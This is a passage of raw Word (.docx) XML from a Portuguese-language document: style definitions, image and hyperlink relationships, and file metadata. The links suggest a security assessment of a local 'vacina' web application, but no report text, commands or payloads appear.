    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF4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F00F5552-F867-4060-B657-D4D9DBD85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C6DC7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004F307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F307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914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91402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191402"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rsid w:val="0024287E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E92ED1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736D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36DBC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Rodap">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="RodapChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00736D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36DBC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Char">
    <w:name w:val="Título 1 Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004F307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4F307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a">
    <w:name w:val="List"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:ind w:left="283" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista2">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:ind w:left="566" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista3">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:ind w:left="849" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista4">
    <w:name w:val="List 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:ind w:left="1132" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista5">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:ind w:left="1415" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Saudao">
    <w:name w:val="Salutation"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SaudaoChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SaudaoChar">
    <w:name w:val="Saudação Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Saudao"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Commarcadores2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="41"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Endereointerno">
    <w:name w:val="Endereço interno"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Corpodetexto">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CorpodetextoChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071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4F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Recuodecorpodetexto">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="RecuodecorpodetextoChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071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rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Referncia">
    <w:name w:val="Referência"/>
    <w:basedOn w:val="Corpodetexto"/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Primeirorecuodecorpodetexto">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="Corpodetexto"/>
    <w:link w:val="PrimeirorecuodecorpodetextoChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:spacing w:after="20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rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Primeirorecuodecorpodetexto2">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="Recuodecorpodetexto"/>
    <w:link w:val="Primeirorecuodecorpodetexto2Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:spacing w:after="200"/>
      <w:ind w:left="360"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rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulodanota">
    <w:name w:val="Note Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtulodanotaChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
    <w:pPr>
      <w:spacing w:after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rsid w:val="004F30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7.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protocol" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/comment.ht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hyperlink" Target="https://hackertarget.com/sqlmap-post-request-injection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2.jpeg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105).asp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g"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.7/en/comments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://192.168.0.58/vacina/login.php?logado=false" TargetMode="External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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS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hyperlink" Target="http://192.168.0.58/vacina/index.php?pg=servidores" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cor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4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jpg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protocol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hyperlink" Target="http://software.dzhuvinov.com/cors-filter.html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F4B8044-B090-4076-89BF-5723CC59B5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1467</TotalTime>
  <Pages>49</Pages>
  <Words>7071</Words>
  <Characters>38184</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>318</Lines>
  <Paragraphs>90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Pamela Beatriz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Diego</cp:lastModifiedBy>
  <cp:revision>130</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-25T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-07T13:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>